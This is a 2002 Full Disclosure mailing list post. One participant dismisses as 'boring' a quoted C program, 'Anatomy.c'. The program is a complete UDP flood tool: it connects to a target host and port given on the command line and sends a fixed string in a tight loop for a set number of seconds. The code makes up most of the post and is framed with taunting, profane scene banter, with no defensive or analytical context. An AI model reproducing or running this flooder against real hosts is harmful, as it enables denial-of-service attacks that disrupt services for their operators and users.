Full Disclosure mailing list archives
411 [ sneak previews ] - #1
From: full-disclosure () lists netsys com (Charles Stevenson)
Date: Mon, 26 Aug 2002 20:11:08 -0600
--0z5c7mBtSy1wdr4F Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Boring... peace, core On Tue, Aug 27, 2002 at 01:37:37AM +0000, Slack wh0re wrote:
/*
* Anatomy.c
* I have no idea how this could be a threat
* if it would be kept private.
*
* Published by: slackwh0re=20
<slackwh0re@fuck-el8-and-fuck-phrack_at_efnet.com>
* Author: unknown <unknown () unknown unk>
*
* k1dd13 us4g3: ./anatomy
* 3ls3: `vi anatomy.c`
*
* --slackwh0re
*
* Full-Disclosure, Fresh and shiny.
* Full-Disclosure, Unreal hacking.
* Full-Disclosure, Cos that's the real elite shit.
* Full-Disclosure, Ken Levine does it.
* Full-Disclosure, - since 1901.
* Full-Disclosure, ~/Full-Disclosure directory.
* Full-Disclosure, Erected because of it.
* Full-Disclosure, Lame el8 blames
* Full-Disclosure,l8er.
*
* He said: "Don't wonder why there is no comments."
*/
=20
#define BOMB_STRING "0123456789ABCDE"
#define BOMB_SIZE 15
=20
#include <stdio.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
=20
int echo_connect(char *, short);
=20
int echo_connect(char *server, short port)
{
struct sockaddr_in sin;
struct hostent *hp;
int thesock;
=20
printf("\n");
printf("Stealth> %s : port %d\n", server, port);
hp =3D gethostbyname(server);
if (hp=3D=3DNULL) {
printf("Stealth> Non-existant host: %s\n",server);
printf("\n");
exit(0);
}
bzero((char*) &sin, sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family =3D hp->h_addrtype;
sin.sin_port =3D htons(port);
thesock =3D socket(AF_INET, SOCK_DGRAM, 0);
connect(thesock,(struct sockaddr *) &sin, sizeof(sin));
return thesock;
}
main(int argc, char **argv)
{
time_t start=3Dtime(NULL);
int s;
int secs;
if(argc !=3D 4)
{
=20
printf("\n");
printf("Anatomy Stealth By T10o Modified By The DvS. U dun PheeR?!\n");
printf("\n");
printf("Usage: st-kill <the lamer host> <fucking port> <secs>\n");
printf("\n");
exit(0);
}
s=3Decho_connect(argv[1], atoi(argv[2]));
secs=3D atoi(argv[3]);
for(;;)
{
while(time(NULL) <=3D start+secs)
{send(s, BOMB_STRING, BOMB_SIZE, 0);}
exit(0);
}
}
=20
/* From the big generousity of el8 and phrack @ efnet. */
/* l4m3rz!! h4h4!!! */
=20
=20
=20
=20
=20
_________________________________________________________________
Chat with friends online, try MSN Messenger: http://messenger.msn.com
=20
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
=20
--=20 Charles Stevenson (core) <core () bokeoa com> Lab Assistant, College of Eastern Utah San Juan Campus=20 http://www.bokeoa.com/~core/core.asc --0z5c7mBtSy1wdr4F Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQE9at+7GAuLrxOyeJMRAvo2AKCU7n8iRNwviWsUwtQPU2EV+L3irwCfQ00I CzUtzH03F1ofC8BF77yTHVk= =0nAR -----END PGP SIGNATURE----- --0z5c7mBtSy1wdr4F--
Current thread:
- 411 [ sneak previews ] - #1 Slack wh0re (Aug 26)
- 411 [ sneak previews ] - #1 Charles Stevenson (Aug 26)
- 411 [ sneak previews ] - #1 full-disclosure () lists netsys com (Aug 26)
- 411 [ sneak previews ] - #1 Isaak Bloodlore (Aug 26)
- 411 [ sneak previews ] - #1 full-disclosure () lists netsys com (Aug 26)
- 411 [ sneak previews ] - #1 Isaak Bloodlore (Aug 26)
- <Possible follow-ups>
- 411 [ sneak previews ] - #1 full-disclosure () lists netsys com (Aug 27)
